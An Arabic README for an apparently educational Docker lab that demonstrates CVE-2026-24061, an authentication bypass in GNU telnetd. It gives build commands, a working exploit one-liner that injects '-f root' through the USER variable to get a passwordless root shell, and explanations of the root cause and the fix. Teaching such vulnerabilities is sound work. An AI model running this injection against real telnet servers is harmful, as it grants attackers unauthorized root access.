
# مختبر Docker تعليمي يوضح CVE-2026-24061، وهو تجاوز للمصادقة في GNU telnetd يسمح بالوصول كجذر عبر حقن الوسائط في متغير البيئة USER.
يحتوي هذا المستودع على مختبر بسيط باستخدام Docker لتوضيح الثغرة الأمنية CVE-2026-24061. تسمح هذه الثغرة بتجاوز المصادقة والوصول كجذر (root) في GNU telnetd على نظام لينكس.
الهدف تعليمي بحت.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
في طرفية أخرى، نفّذ:
USER="-f root" telnet -a localhost 2323
بعد ذلك، سيتم منح الوصول مباشرة كجذر (root)، دون طلب كلمة مرور.
يحدث الخلل بسبب حقن وسائط (arguments) أثناء استدعاء الأداة /usr/bin/login. يقوم telnetd ببناء سطر الأوامر المستخدم لاستدعاء login ديناميكيًا ويتضمن قيمة متغير البيئة USER عبر العنصر النائب %U، دون أي تنقية (sanitization).
وبما أن أداة login تقبل الخيار -f، الذي يتجاهل مصادقة كلمة المرور، يمكن للمهاجم تعيين USER="-f root" وإجبار تسجيل الدخول المباشر كجذر.
ونظرًا لأن telnetd يعمل بصلاحيات مرتفعة، فإن هذا التلاعب يؤدي فورًا إلى شل جذر (root shell) دون الحاجة إلى بيانات اعتماد صالحة. الاستغلال بسيط، ولا يتطلب أي تفاعل مسبق، ويمكن أتمتته بسهولة، مما يبرر درجة CVSS 9.8.
تم إصلاح الثغرة من خلال إدخال التحقق والتنقية لمتغير USER، وحظر القيم التي تبدأ بشرطة والأحرف الخاصة، مما يمنع حقن الوسائط في login.